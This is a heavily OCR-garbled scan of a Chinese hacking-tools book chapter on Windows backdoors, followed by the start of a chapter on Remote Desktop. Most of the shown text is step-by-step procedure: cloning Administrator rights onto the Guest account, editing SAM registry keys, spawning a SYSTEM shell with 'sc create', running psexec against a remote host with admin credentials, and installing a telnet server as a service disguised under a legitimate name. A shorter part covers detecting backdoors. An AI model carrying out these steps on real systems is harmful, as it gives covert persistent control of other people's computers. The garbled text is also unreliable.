Microsoft Windows [hR 本 6.1.7688] And Set IUSR_UICIIM Password to "SetNewPass" 
1 2 机 


上 尺 权 所 有 ce> 200923 Microsoft Corporation, 保留 所 有 和 窜 利 。 


:Msers John>e: :N\>ca-exe M192.168.59.128 haministhatoh 123 Guest 
dninictr n ln np p Up A rE 上 


Written by net%euwes 2002 dansnowB21cn.com 


“hu netkeues 2002/04/28 

Written by netieves 2002 。Qdqansnowe21lcn .com 
Connect i192.168.59 .128 --- -OK 

Usage: Sh NMNIPE hccount Passwordu Clonehccount ClLonePassworad Get SID of Guest --- -OK 
Prepairing --- -OK 

hccount : Usekname 《Own fdministrator Prhiuilegey> Processindg ERROR 

Password: Password of User 

Clonefccount: CloneUser’s fliccount Name Must filreadvy Clean Up ....ERROR 

GlonePassword: Set Password of Clonellser | -yy 


输入 “e:” 后 按 <Enter> 岗 输 入 “ca.exe" 后 输入 “ca.exe \192.168.59.128 Administrator 
键 ， 切 换 至 E 盘 根 目录 。 按 <Enter> 键 , 碍 123 Guest 后 按 <Enter> 键 , 即 可 完成 账号 的 复制 。 
其 语法 功能 。 


© “ca.exe \192.168.59.128 Administrator 123 Guest” 命 令 的 含义 是 将 目标 计算 
Su 机 中 密码 为 123 的 Administrator 账户 权限 克隆 给 Guest 账户 ， 即 使 得 Guest 拥 
所 未。 有 与 Administrator 一 样 的 管理 员 账 户 权限 。 


12.1.2 手动 克隆 账号 明光 


在 Windows 系统 中 ，SAM 是 用 于 管理 系统 用 户 账 户 的 数据 库 ， 它 体 存 系统 中 所 有 上 账 
户 的 配置 文件 路 径 、 账 户 权 限 和 密码 等 。 而 SID 则 是 用 户 账 户 的 唯一 映 份 编 写 ， 它 用 于 确 
定 当 前 账户 是 否 属于 管理 员 账 户 。 

Windows 系统 注册 表 中 有 两 处 保存 了 用 户 账 户 的 SID: SAM\Domains\Account\Users 分 
文 下 的 子 键 名 和 在 该 子 键 F 子 项 的 值 。 登 录 Windows 系统 时 ， 谍 取 的 信息 是 所 对 应 子 键 下 
子 项 的 值 ， 而 查询 账户 信息 时 读 取 的 是 Users 分 文 下 的 子 键 名 ， 因 此 当 用 Administrator 子 
键 的 F 子 项 履 羡 其 他 账号 的 FE 子 项 之 后 ， 束 造成 了 账号 是 管理 员 权 限 但 得 询 还 是 原来 状态 
的 情况 ， 从 而 达到 元 隆 账 号 的 目的 。 
STEP01: ”新建 记事 本 STEP02: 输入 提升 至 SYSTEM 权限 的 代码 


WinPcap J 守 | Fe 区 引 


WinRAR 
附 性 文件 ([F) 编辑 (E) 格 才 (DO) 童 震 (V) 帮助 (H) 
司 Windows 资源 管理 器 sc_Create SysClD binPath= “cmd /KE start” 
倒 壬 : type= Da type= interact 
sc start SvysCMD 


团 单 击 “开始 ”按钮 。 辆 选择 “所 有 程序 ”> ”在 “记事 本 ”窗口 的 编辑 区 中 输入 如 图 所 示 的 代 
“附件 ”> 记事 本 命令。 码 , 将 当前 用 户 权限 提升 至 SYSTEM 权 限 。 
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ST IF 一 一 > 


工具 全 攻略 
售 人 人 他 
STEP03: 保存 编辑 的 代码 STEP04: 设置 保存 位 置 和 文件 名 


编辑 (E) ”格式 (D) ”前 夺 
新 建 (N) Ctrl+N | “cmd /Ak start” 
打开 (QO)., Ctrl+ 口 
保存 (S$) Ctrl+s 
另存 为 (A)... 


页 面 设置 (U)... 
打印 [P),.， Ctr|+P 


退出 0 


输入 完毕 后 选择 “文件 ” >“ 保存 " 命令 。 在 地 址 栏 中 选择 该 设置 文件 名 为 
文本 文档 的 保存 位 置 。 “syscmd.bat”, 单 


击 “ 保 存 ” 按 钮 。 
STEP05: 运行 批 处 理 文件 STEP06: 选择 查看 消息 


a 
网 络 


QuickGHM 


名 , 交互 式 服务 检测 
此 计算 机 上 运行 的 程序 正在 尝试 显示 一 条 消息 
程序 可 能 需要 您 的 信息 或 权限 来 完成 任务 。 

这 种 情况 ? 


十 AN A 


jp 


Fj EL 


PEID YEhE 
会 稍 后 捏 醒 我 


(多 ) 显示 程序 详细 信息 (D) 


| 
bd 


双击 刚刚 创建 的 syscmd.bat 文 件 快捷 图 标 , 运 


行 ”弹出 “交互 式 服务 检测 ”对 话 框 ， 单 击 “ 查 看 消 


该 批 处 理 文件 。 息 ” 选 项 
STEP07: 输入 “regedit” 命 令 STEP08: 双击 管理 员 账 户 下 的 F 子 键 


级 ” 注册 表 编 辑 器 

文件 (F) ”编辑 (E) ” 音 春 (V) 收藏 夫 (A) 帮助 (H) 
日 - 调 计算 机 

由 … 内 HKEY CLASSES_ ROOT 

由 "… 册 HKEY CURRENT_USER 


Microsoft Windows [ 吸 本 6-1-?699] 
mE =] C2 2867 Microsoft Gorporat1ion - 


CGC: “Windows™s ystemid227regedait 


日 -上 Domains 
: 加 .用 Account 
: 由 - 几 Aliases 


: : |) Groups 


- Users 
000001F4 
000001F5 


次 展开 至 000001F4 双击 F 子 键 项 。 


在 打开 的 命令 提示 符 窗口 中 输入 “regedit" 命令 ， 辆 依 
打开 注册 表 编 辑 器 。 分 支 。 
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< 生境 
后 门 技术 


如 果 在 HKEY LOCAL MACHINRSAM\SAM\Domains\Account\Users 下 没有 找 
© 到 000001F4 键 值 ， 则 选中 HKEY LOCAL MACHINE 下 的 SAM 选项 ,在 菜单 栏 中 
提示 “选择 “编辑 ” >“ 权限 ”命令 ， 弹 出 “SAM 的 权限 ”对 话 框 ， 如 下 图 所 示 。 在 列表 
框 中 选中 SYSTEM 选项 ， 单 击 “ 确 定 ”按钮 即 可 更 改 SAM 的 权限 为 SYSTEM， 可 
查看 HKEY LOCAL MACHINRSAM\SAM\Domains\Account\Users 下 的 000001F4 

和 000001F5 键 值 。 


复制 项 名 称 (C) 


前 找 (F)..… Ctrl+F 
查找 下 一 个 (X) F3 


STEP10: 双击 Guest 账户 下 的 F 子 键 


文件 (站 ”编辑 (E) 章 寿 (V) 收藏 夫 (A) 帮助 (H) 
日 - 亩 计算 机 
向 - 肌 HKEY_CLASSES_ROOT 
外- HKEY_CURRENT_USER 
| TENTETETETT 殉国 殉国 汪 下 - 则 HKEY_LOCAL_MACHINE 


19 3F 04 Ca SE 由 -由 BCD00000000 
00 0 00 ey 由 .县 HARDWARE 
no000000000 国 5 时 SAM 
00 00 00 00 0 日 坝 SAM 
nn 01 02 00 : | 1 De 
00 00 00 00 | . BB Account 
on ol vo v0 i ”| 由 - 肌 Aliases 
88 52 35 i om 
Users 
000001F4 
本 可 000001F5 
选中 数值 数据 ， 按 单 击 “确定 ”按钮 。 依次 展开 至 000001F5 双击 F 子 键 项 。 
<Ctrl+iG% 组 合 键 。 wa 
STEP11: 四 贴 F 键 值 的 数值 数据 STEP12: 返回 Windows 采 面 
编辑 二 进 制 数值 | 
数值 名 称 9): 
了 
数值 数据 属 ) : 返回 到 您 的 Windows 点 面 


如 时 程序 仍 需要 注意 , 它 将 在 下 面 旦 示 自 己 的 窗口 。 


当 您 完成 后 ， 或 者 如 果 您 需要 返回 到 您 的 壶 画 以 获取 详细 信 
息 ， 现 在 请 单 击 “ 返 回 ”。 


加 选中 数值 数据 ， 按 加 单 击 “确定 ”按钮 。 在 “交互 式 服务 检测 ”对 话 框 中 单 击 “ 立 即 返 回 ” 
ar 组 各 种。 按钮 。 
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ST Pe > 


工具 全 攻略 


人 人 人 他 
STEP13: 输入 “cmd” 命令 STEP14: 查看 Guest 账户 信息 


潜行 CA\Windows\system32\cmd.exe 
Microsoft Windows [IR 本 6.1.7696] 2 
巾 权 所 有 <“c> 2009 Microsoft Cokporkation 坪 | = dl 四 
GC:N\Usersvlohn2net user guest 
2 Guest 


3) Windows 将 根据 你 所 输入 的 名 称 ， 为 您 打开 相应 的 程序 、 
文件 去 、 文 习 或 Internet 资源 。 


供 来 宾 访 回 计 算 机 或 访问 域 的 内 四 帐户 


969 《系统 默认 慎 》 


No 
从 不 


2012/9/25 11:08:03 
以 不 
Ey 2012/9/25 11:98:03 


Es = Yes 


Ea 
用 己 No 


[个 诗 的 工作 加 h11 
按 <WIN+R> 键 , 弹出 “运行 ” 岗 单 击 “ 确 定 ” 输入 “net user guest" 命令 后 按 <Enter> 键 , 可 查 
对 话 框 ,输入 “cmd” 命 令 。 按钮 。 看 Guest 账 号 属性 ,该 账号 已 被 禁用 且 密 码 不 过 期 。 


个 当 黑 客 成 功 控制 一 合 目标 计算 机 时 ， 便 可 利用 命令 实现 Guest 账户 的 启用 
与 禁用 。 当 输入 “net user guest/active:no” 时 , 表示 禁用 Guest 账户 ; 当 输 入 “net 


提示 。 user guest/active:yes” 了 时， 表示 启用 Guest 账户 。 


12.2 使 用 工具 创建 系统 服务 后 门 曝 光 


系统 服务 后 门 技术 是 指 在 黑客 成 功 入 侵 目 标 计 算 机 后 ， 通 过 修改 Windows 系统 中 的 服 
务 程 序 来 制造 后 门 ， 便 于 墨客 日 后 成 功 登 录 目 标 计算 机 。 了 解 墨 客 创建 系统 服务 后 门 的 方 
式 ， 才 能 更 好 地 发 现 目 己 的 系统 中 是 否 存 在 后 门 ， 以 做 好 防范 工作 。 


12.2.1 使 用 Instsiy 创建 系统 服务 后 门 曝光 


Instsrv 是 一 个 可 以 上 自由 安装 / 翻 载 Windows 系统 服务 的 小 工具 , 它 具 有 目 由 指定 服务 名 
称 和 服务 所 执行 程序 的 功能 ， 而 实现 这 些 功 能 只 需 使 用 简单 的 命令 即 可 完成 。 


STEP01: ”下载 PsExec 和 Instsrv 软件 STEP02: 获取 远程 计算 机 的 命令 行 


E \\192.168.59.128: cmd.exe 


Microsoft Windows [hR 本 6-1-2698] 二 
[nk =] 《c> 2009 Microsoft Corporation., 保留 所 有 相 和 | o 


个 名 -| 计算 机 新 加 卷 (E:) ， 


组 织 了 包含 冯 库 中 Y 共享 > 新 建文 件 去 


,HE John>e: 


E:N>Dpsexec \o9292.168.59.128 -uU administkhatokr -D“123”cmd.exe 


+ 收费 去 PsExec ul-98 — Execute processes remotely 
CopurIgdht 《C> 20091-20109 Mark Russinouich 
到 下 载 , 已 F Susinteknals 一 Www-susinteknals -conm 
园 碾 面 . 
: 有 Er | Microsoft Windows [hR 本 6.1.?688] Wh 
a 最 访问 n= 1 = 
PsExec.exe Instsrv,exe C:NUindowsssystem32》 
加 库 
名 1 人 人 、 i 中 人 人 、 - 、\ 一 、 
将 PsExec.exe 和 instsrv.exe 置 于 E 盘 根 目录 下 。 输入 “e:” 后 按 <Enter> 键 , 输入 获取 远程 计算 机 命 
作 4 二 -人 人、 人、 
令 行 的 命令 。 


232 


制 tlntsvr 文件 


ot 


STEPO3: 


计算 机 ， 系统 保留 (C:) % Windows System32 


新 建文 件 去 


上 


图 TIMER.DRV 
tintlgnt.ime 
:| tIntadmn.exe 
[ea tIntsess.exe 


fm™ 
a= tlntsvr.exe 


人 七 | tlscsp.dll 
久 TOOLHELP.DLL 


将 本 地 计算 机 的 tlntsvr 复 制 到 目标 计算 机 的 CA\ 
Windows\System32 路 径 下 。 


STEP05: 打开 “运行 ”对 话 框 


EE 


Windows 将 根据 您 所 办 入 的 和 名称， 为 您 打开 相应 的 程序 . 
文件 去、 文 习 或 Internet 资源 。 


轩 | 使 用 管理 权限 创建 此 任务 。 


输入 “services.msc"。 单 击 “确定 ”按钮 。 


< 第 12 章 
后 门 技术 


STEP04: 添加 Syshell 服务 


Copyright CGC> 20661-2010 Mark Russinovich 
Susinteknals 一 www.sysinternals.com 


Microsoft Windows [h 本 6.1-2699] 
hi 可 上 折 有 C2 2003 Microsoft Go -257 


各 甸子 三 吉 简 |。 


es 
C:\Windows\s vstem32>e: 

E:“"\>?instsrv.exe Syshell CGC:\WINDOWSN\s ystem32\t lntsvr.exe 
The service was successfuly added? 

Make sure that vou go into the Control Panel and use 
the Services applet to change the ficcount Name and 


Password that this newlu installed service will use 
for its Security Context. 


输入 “e:” 后 按 <Enter> 键 ， 输 入 添加 Syshell 服 务 
的 命令 。 
STEP06: 查看 添加 的 服务 


“服务 
文件 (F) ”操作 (A) ”查看 (V) ”帮助 (H) 
负 罗 | 全 | 国 加 | 回国 | @ 1 


上 服务 (本 地 ) 名 称 描述 态 


SPP Notification ,,.， 提 殿 软 忻 授 权 激 ,， 
过 SSDP Discovery ” 当 发 现 了 使 用 SS..， 
上 Sup 维护 和 和 担 高 一 段 ..… 


已 启动 
已 启动 


ra re ET TFT gi 
| 


在 窗口 中 可 看 见 Syshell 服 务 ， 黑客 可 通过 该 服务 远 
程 登录 目标 计算 机 。 


老 要 删除 Windows 系统 中 的 服务 ， 则 可 以 使 用 sc 命令 来 实现 ， 打 开 命 令 
© 提示 符 窗口 ， 输 入 “sc delete+ 服 务 名 称 ” 即 可 ， 例 如 输入 “sc delete Syshell” 
提示 “后 按 〈Enter》 键 ， 便 可 将 Syshell 服务 从 Windows 系统 中 删除 ， 如 下 图 所 示 。 


管理 员 ; CNWindows\system32\cmd,exe 


Microsoft Windows [hl 本 6.1.?6891] 
rb i=] 《Cc> 2009 Microsoft Corporation, 怀 饪 


CG:\Users\vJohn>sc delete Syshell 


[SC] DeleteService 成 中 


服务 
文件 (月 ”操作 (A) ”前 看 (V) 帮助 (H) 
名 外 | 国 | GB 日 画 | PP 1 
服务 (本 地 ) 名 称 四 


Software Protect,,， 启 用 ,,， 
iSPP Notification ,.， 提 从 有 


Superfetch 
SysCMD 
System Event N,.， 监视 .,. 


12.2.2 ”使 用 $YVinstW 创建 系统 服务 后 门 曝光 


仅仅 依靠 系统 本 喘 的 工具 还 不 能 完全 实现 系统 服务 后 门 的 制作 ， 还 需要 借助 于 
Srvinstw 软件 的 帮助 。Srvinstw 软件 是 一 蒜 可 以 创建 和 添加 系统 服务 的 图 形 化 工具 。 

通过 Srvinstw 可 以 添加 程序 为 Windows 系统 服务 ， 从 而 实现 系统 服务 后 门 的 制作 ， 这 
里 以 PeerDistSvc 为 例 介 绍 使 用 Srvinstw 创建 系统 服务 后 门 的 操作 方法 。 
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Py > 
全- 工具 全 攻略 


合 人 他 他 


STEP01: ”启动 Srvinstw 程 友 


计算 机 ”新 加 卷 (E:) ， srvinstw 


图 打开 


组 织 Y 新 建立 件 去 


0 


R 


SRVINSTW.EXE 


思 下 载 
恩 训 面 
闻 最 F 访 问 


加 库 
国 视频 


下 载 Srvinstw 后 将 其 解压 到 本 地 计算 机 中 ， 双 击 
SRVINSTW.EXE 快 捷 图 标 。 


STEP03: 选择 本 地 计算 机 


元 安装 / 移 除 服务 (汉化 WinG). 区 要 


请 选择 将 要 执行 的 计算 机 类 型 . 


个 远程 机 器 
计算 机 名 : | 


选择 “本 地 机 器 " 
单 选 按钮 。 
STEP05: 单 击 “ 完 成 ”按钮 


国 单 击 “下 一 步 " 按钮 。 


塌 , 安装 / 移 除 服务 (汉化 WinG), 
服务 移 除 向 导 准 备 好 移 除 服务 . 


服务 : BramehCache 


点 击 完 成 执行 操作 . 


STEP02: 选择 移 除 服务 
二 | 安装 / 称 除 服务 (汉化 WinG). 
欢迎 使 用 本 软件 . 


f ”安装 服务 


选择 “ 移 除 服务 ” 
单 选 按 钮 。 
STEP04: 选择 要 删除 的 服务 


贺 单 击 “ 下 一 步 ”按钮 。 


泡 ) 安装 / 移 除 服务 (汉化 WinG). 
请 选择 将 要 上 除 的 服务 名 字 . 


选择 要 删除 的 服务 。 国 单 击 “ 下 一 步 ”按钮 。 


所 选 的 服务 无 误 后 单 击 “完成 ” 按钮 。 


在 STEP03 中 ， 如 果 黑 客 无 法 通过 图 形 界 面 控制 目标 计算 机 ， 但 已 建立 具 


提示 
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有 管理 员 权 限 的 IPC$ 和 连接 ， 则 可 以 选择 “远程 机 器 ” 单 选 按钮 。 


STEP06: 服务 成 功 移 除 


侈 | 安 法 / 移 除 服务 [汉化 WinG). 


弹出 对 话 框 ,提示 用 户 服务 成 功 移 除 ， 单 击 “ 确 定 ” 
按钮 。 


STEP08: 选择 安装 服务 


侈 ) 安装 / 移 除 服务 (汉化 WinG). 
欢迎 使 用 本 软件 . 


个 移 除 服务 


请 按 下 一 步 继续 
We EE 一 步 [B 


团 选 择 “ 安 装 服务 " 单 击 “ 下 一 步 " 按钮 。 


单 选 按钮 。 
STEP10: 输入 服务 名 称 


他 安 法 / 移 除 服务 (汉化 WinG). 


请 输入 服务 名 称 . 注意 区 分 大 小 写 及 字符 正确 性 . 


输入 服务 的 名 称 。 


单 击 “ 下 一 步 ”按钮 。 


< 但 1 章 
后 门 技术 


STEP07: 再 次 启动 Srvinstw 程序 


) 计算 机 ， 新 加 卷 (E:;) ， srvinstw 


加 打开 


组 织 Y 新 建文 件 去 


R 


SRVINSTW.EXE 


打开 SRVINSTW.EXE 快捷 图 标 所 在 的 文件 夹 窗口 ， 
双击 该 图 标 。 


STEP09: 选择 执行 的 计算 机 类 型 


好 ) 安装 / 移 除 服务 (汉化 WinG). 
请 选择 将 要 执行 的 计算 机 类 型 . 


[Fa 


选择 “本 地 机 器 ” 单 击 “ 下 一 步 ”按钮 。 


单 选 按钮 。 
按钮 


SIER 们 前 单 击 “ 浏 览 ” 


他 安装 / 移 除 服务 汉化 WinG)， 区 到 
请 输入 程序 路 径 . 此 路 径 必须 是 本 地 计算 机 真实 路 径 


厂 移动 文件 到 systen32 目 录 


《< 上 一 步 @) | 下 一 步 吕 >| 取消 | 
单 击 “浏览 ”按钮 。 


ss 


客 本 
PE 工具 人 攻 了 


全 人 人 他 
STEP12: 选择 tlntsvr 文件 STEP13: 确认 所 选择 的 程序 


克 安装 / 移 除 服务 (汉化 WinG). 下 3 本 
请 输入 程序 路 径 . 此 路 径 必 须 是 本 地 计算 机 真实 路 径 . 


C:\Windows\System32\tlntsv. exe 


名 称 


E31 timeout,exe 


| tIntadmn.exe 


tintsess,.exe 


| 加 tlntsvr,exe 


己 
打开 (O) 人 职 消 


国 打开 系统 分 区 中 的 。 圈 选中 tlntsvr 选 项 ， 单 ”确认 所 选择 的 程序 路 径 无 误 后 单 击 “ 下 一 步 ” 按钮 。 
System32 文件 夹 。 击 “ 打 开 ” 按 钮 。 


STEP14: 选择 安装 的 服务 种 类 STEP15: 设置 服务 的 运行 权限 


泡 ) 安装 / 移 除 服务 (汉化 WinG). 过 | 安装 / 称 除 服务 (汉化 WinG). 
请 选择 您 要 安装 的 种 类 . 设 定 服务 运行 权限 . 


团 选择 “软件 服务 (使 用 其 。 国 单 击 “下 一 步 ” 辆 选择 “系统 项 上 ” 辆 单 击 “ 下 一 步 ” 按钮 。 
自身 进程 )” 单 选 按钮 。 按钮 。 ri 
STEP16: 选择 服务 的 启动 类 型 STEP17: 确认 所 添加 的 服务 


区 到 | | 起 安 装 / 移 除 服 务 (汉化 WinG). 


钠 基 于 :1 璋 县 引导 “和 系统 "选项 只 能 由 文件 服务 安装 同 写 准备 好 安装 服务 . 


服务 : BranchCache 


加 选择 “自动 " 单 选 按钮 。 国 单 击 "下 一 步 " 按钮 。 确认 所 添加 的 服务 名 称 无 误 后 单 击 “ 完 成 ”按钮 。 
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< 第 12 章 
后 门 技术 


STEP19: 添加 服务 描述 信息 


3 管理 员 : C:\Windows\system32\cmd.exe 

Microsoft Windows [hh 水 hh 1] A 

ha 林 w EF 有 “C> 20069 Microsoft Gorporation, = | o 
CG: sers wohn>sc ‘descrintion PeerDistSuc 此 服务 绪 存 来 
目 本 地 子 网 上 对 等 方 的 网 络 内 容 。 

[SC] ChangeServiceConf ig2 成 功 

sxUsersJohn> 


弹出 对 话 框 ， 提 示 用 户 服务 安装 成 功 ， 单 击 “ 确 定 ” 在 命令 提示 符 窗口 中 输入 “sc description + 服务 名 


按钮 。 称 + 服 务 描述 信息 ”后 按 〈《 Enter ) 键 , 为 该 服务 添加 
描述 信息 。 


在 Windows 系统 中 ， 系 统 服 务 通 第 有 两 个 名 称 ， 即 服务 名 称 和 显示 名 称 。 

今 “服务 ”窗口 中 显示 的 名 称 为 显示 名 称 ,， 而 若 要 查看 其 服务 名 称 ， 需 要 在 “服务 ” 

提示 。 窗口 中 双击 对 应 的 服务 选项 ， 在 弹出 的 对 话 框 的 “常规 ”选项 卡 下 可 看 见 该 服 
务 的 服务 名 称 ， 同 时 也 可 看 见 其 显示 名 称 。 


STEP20: 双击 BranchCache 服务 选项 STEP21: 查看 可 执行 文件 路 径 和 描述 


服务 BranchCache 的 尾 性 (二 地 计算 初 ) 
文件 (F) ”操作 (A) ”查看 (V) ”帮助 (H) 常规 ”| 登录 | 恢复 | 依存 关系 | 
钊 办 国 图 Es 图 | bP ll 1 服务 名 称 : FeerlistSve 

总 服务 (本 地 ) 匀称 ea 显示 名 称 : BrarchEache 

5 BitLocker Drive Encryption Service 描述 : 此 服务 综 存 来 自 本 地 子 网 上 对 等 方 和 9 络 内 容 Se 


ss Block Level Backup SR Service 可 执行 文件 的 路 径 : 
5 BlIuetooth Support Service C:\Windows\System32\tlntisve. exe 


让 类 型 中 


主 B 


COM+ Evert System 服务 状态 : 已 启动 


打开 “服务 ”窗口 ， 双 击 BranchCache 服 务 选项 。 查看 该 服务 的 描述 信息 和 可 执行 文件 路 径 。 只 要 该 
服务 运行 ， 黑 客 就 能 远程 登录 该 计算 机 。 


12.3 检测 系统 中 的 后 门 程序 


后 门 是 在 黑客 已 成 功 入 侵 日 标 计算 机 之 后 在 其 系统 中 创建 的 。 因 此 用 户 大 要 检测 系统 
中 是 否 存在 后 门 系统 ， 则 需要 检测 系统 中 的 进程 、 系 统 的 月 动 信息 以 及 系统 开放 的 冰 口 等 
信息 。 


COM+ System Application 局 动 GS) 
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客 二 
PE 工具 人 攻 了 


1. 简单 手工 检测 法 

凡是 后 门 ， 必 然 需 要 隐 下 的 藏身 之 所 ， 要 找到 这 些 程序 ， 融 需要 仔细 奉 找 系统 中 每 个 
可 疑 之 处 ， 如 目 局 动 项 。 据 不 完全 统计 ， 目 局 动 项 目 有 近 80 多 种 。 

用 AutoRuns 检查 系统 局 动 项 ， 观 聚 可 疑 局 动 服 务 、 可 疑 局 动 程序 路 径 。 如 一 些 常见 系 
统 路 径 一 般 在 system32 下 ， 如 果 在 非 系统 的 system32 目录 下 发 现 notepad、System、 
smss.exe、csrss.exXe、winlogon.exe、services.exe、1]sass.exe、Sspoolsv.exe 这 类 进程 中 的 两 个 ， 
那么 你 的 计算 机 很 可 能 已 经 中 毒 了 。 

如 采 是 网 页 后 门 程序 ， 一 般 检 和 奉 最 近 被 修改 过 的 文件 。 目 前 一 些 高 级 Webshell 后 门 已 
经 文 持 更 改 目 身 的 创建 修改 时 间 来 迷惑 管理 员 了 。 

2. 拥有 反 向 连接 的 后 门 检测 

这 关 后 门 一 般 会 监听 茶 个 指定 断口 , 检 租 这 关 后 门 需要 用 到 DOS 命令 。 在 没有 打开 任 
何 网 络 连接 页 面 和 防火 墙 的 情况 下 输入 “netstat -an” 监 听 本 地 开放 端口 ， 看 是 否 有 本 地 IP 
连接 外 网 IP。 

3. 无 连接 的 系统 后 门 

如 shift、 放 大 锐 、 屏 保 后 门 ， 这 类 后 门 一 般 都 会 修改 系统 文件 ， 所 以 检测 这 类 后 门 的 
方法 就 是 对 照 它们 的 MD5 值 。 如 sethc.exe (shift 后 门 ) 用 加 密 工 具 检 测 的 正常 数值 是 
“MD5: f09365c4d87098a209bd10d92e7a2bed”， 如 果 数 值 不 符 ， 就 说 明 被 算 改 过 了 。 

4. CA 后 门 

CA 克隆 账 号 这 样 的 后 门 建立 以 “$” 为 后 级 的 超级 管理 员 ， 在 DOS 下 无 法 查看 该 用 
户 ， 用 户 组 管理 也 不 显示 该 用 户 ， 手 工 和 检查 一 般 是 在 SAM 里 删除 该 账号 键 值 。 删 除 时 当 
然 要 慎重 ， 没 有 经 验 的 用 户 最 好 还 是 用 工具 。 当 然 ，CA 后 门 有 可 能 克隆 的 是 Guest 用 户 ， 
所 以 最 好 在 服务 器 上 给 Guest 设置 一 个 复杂 密码 。 


5s. ICMP 后 门 
这 种 后 门 比较 罕见 ， 要 预防 它 ， 只 有 在 默认 Windows 防火 墙 中 设置 只 允许 ICMP 传 入 
的 回 显 请 求 了 。 


6. 了 Rootkit 后 门 

这 类 后 门 隐藏 比较 深 ，1989 年 发 现 首 例 在 UNIX 上 可 以 让 自己 的 进程 被 ps -aux 命令 
但 看 的 rootkit 和 雏形。 此 后 这 类 高 级 隐藏 工具 不 断 发 展 ， 并 在 1994 年 成 功 运用 在 高 级 后 
门 上 并 开始 流行 ， 一 直 保 持 看 后 门 的 领先 地 位 ， 包 括 最 新 出 现 的 Boot Root 也 是 该 后 门 
的 一 个 高 级 变种 。 为 了 抵御 这 类 高 级 后 门 ， 国 外 也 相继 出 现 了 相关 碍 杂工 具 。 例 如 : 葵 
兰 的 反 Rootkit 的 工具 Gmer、Rootkit Unhooker 和 RKU 都 可 以 检测 并 清除 包括 变种 的 
Rootkit。 
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介绍 了 几 个 远程 控制 的 实例 ， 包 括 远 程 果 面 连 接 与 协助 、 利 用 “ 任 
我 行 ” 软件 进 行 远 程控 制 、 使 用 WinShell 实现 远程 控制 和 使 用 QuickIP 进行 多 
点 控制 。 


〇 远程 桌面 连接 与 协助 

O 利用“ 任 我 行 ” 软 件 进行 远程 控制 
O 〇 用 WinShell 实现 远程 控制 

O 用 QuickIP 进行 多 点 控制 


13.1 | 远程 桌面 连接 与 协助 


远程 更 面 采 用 了 一 种 类 似 Telnet 的 技术 ， 远 程 昌 面 连 接 组 件 是 微软 公司 从 Windows 
2000 Server 开始 提供 的 ， 用 户 只 需 通 过 简单 设置 即 可 开局 Windows XP、Windows 7 和 
Windows 8 系统 下 的 远程 果 面 连接 功能 。 

当 某 人 台 计 算 机 开启 了 远程 加 和 而 连 接 功 能 后 ， 其 他 用 户 束 可 以 在 网 络 的 男 一 妆 控 制 这 台 
计算 机 了 ， 可 以 在 该 计算 机 中 安装 软件 、 运 行程 序 ， 所 有 的 一 切 都 好 像 是 直接 在 该 计算 机 
上 操作 一 样 。 通 过 该 功能 ， 网 络 管理 员 可 以 在 家 中 安全 地 控制 单位 的 服务 器 ， 而 且 由 于 该 
功能 是 系统 内 置 的 ， 所 以 比 其 他 第 三 方 远程 控制 工具 使 用 更 方便 、 灵 活 。 


13.1.1 Wind0wWs 系统 的 远程 桌面 连接 


远程 轩 和 而 可 让 用 户 可 徘 地 使 用 远程 计算 机 上 的 所 有 应 用 程序 、 文 件 和 网 络 资源 ， 残 如 
同 用 户 本 人 束 坐 在 远程 计算 机 的 面前 一 样 ， 不 仅 如 此 ， 本 地 运行 的 任何 应 用 程序 在 有 用户 使 
用 远程 吕 面 (家 、 会 议 室 、 途 中 ) 连接 后 仍 会 运行 。 

在 Windows 7 系统 中 保留 了 远程 果 秃 连接 功能 ， 以 实现 请 专家 远程 控制 ， 帮 助 用 户 解 


决 计算 机 的 问题 。 如 来 需 要 实现 远程 果 面 连接 功能 ， 可 按 如 下 操作 进行 设置 。 
STEP01: 打开 “控制 面板 ”窗口 STEP02: 打开 “系统 "窗口 
加 和 鲍 - 砚 ，is 和 而 册 ， 所 和 过 面板 页 ， ||| 达到 GO es ,FM 


文件 (F) ”编辑 (E) ”查看 (V) 工具 (T) 帮助 (H) 文件 (] 编辑 (E) ”前 看 (V) 工具 (T) 帮助 (H) 


控制 面板 主页 查看 有 关 计 算 机 的 基本 信息 @ 


安 尘 内 在 I[RAM: 4.00 GB 12.90 GB 可 一) 


调整 计算 机 的 设置 得 看 方式 大 图 标 
~ Windows 版 本 
(6N) 一 [| = ee 
VY 3 了 鼠标 3 Windows 7 旗舰 版 
> 索引 选项 | 通知 区 域 图 标 加 系 缠 员 版 权 所 有 @@ 2009 Microsoft 
Am \ 县 人 部 高 级 | 奈 统 i Corporation。 保 针 所 有 权利 。 
(全 ) 同步 中 心 A 网 络 和 共享 中 心 er 
[二 位 置 和 其 他 传感器 膨 文件 夹 选项 
| BW a 峰 二 em Wi 
另 请 对 阅 型 号 : Ghost 7(SP1) 电 腑 公司 装机 旗舰 版 v2012.01 
园 性 能 信息 和 工具 | 颜色 管理 扣 作 上 必 人 人 对 纹 分 要 不 本 用 
i lS 处 理 器 : Pentium(R) Dual-Core CPU E6300 
| 坊 ， 习 难 角 答 跟 用 户 帐户 Mine om Eache @ 2.80GHz 2.80 GHz 


“系统 ”链接 。 
系统 属性 设置 


单 击 
STEPO3: 


单 击 “ 远 程 设置 ”链接 。 


系统 保护 | 远程 | 


多 许 返 程 协助 连接 这 台 计 算 机 蛋 ) | 


勾 选 “允许 远程 协助 连接 这 台 计 算 机 ” 复 选 框 。 
J CE 


Ve 


EE 


应 用 以) 


单 击 “ 选 择 用 户 ” 按钮 ， 添 加 那些 需要 进行 远 
程 连接 但 还 不 在 本 地 管理 员 安全 组 内 的 用 户 。 
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Ms 


知 想 成 功 建立 远程 控制 ; 


远程 控制 技术 


连接 ， 则 对 方 也 应 义 次 此 复 选 框 。 


STEP04: 添加 远程 果 面 用 户 


大 面积 到 所 到 除 国生 晤 内定 站 从 计算 机 。 劝 外， 管理 员 组 中 的 任何 


列 出 )。 


hdministrator 已 经 有 访问 机。 


出 除 人) 
和 限 新 用 应 帐户 或 用 户 深 加 到 共 他 组 ， 请 转 到 “控制 面板 ”， 


单 击 “ 添 加 ”按钮 。 
STEP06: 返回 “远程 呆 面 用 户 ” 对 话 框 


不 硬 加 到 所 列 人 ital ee 另外 ， 管 理 员 组 中 的 任何 


Administrator 已 经 有 访问 可。 


| 和 户 帐户 或 将 用 户 添加 到 其 他 组 ， 请 转 到 “控制 面 株 ”， 


SH ,确定 ， 按钮 。 


STEP08: 远程 昌 面 连接 


示 宝 |: computer. fabrikam. com 


计算 机 CC): 
用 户 名 : 未 指定 
计算 机 名 称 字 段 为 宝 。 请 输入 充 整 的 远程 计算 机 名 称 。 


[名 | | 帮助 o | 


STEP05: 选择 用 户 


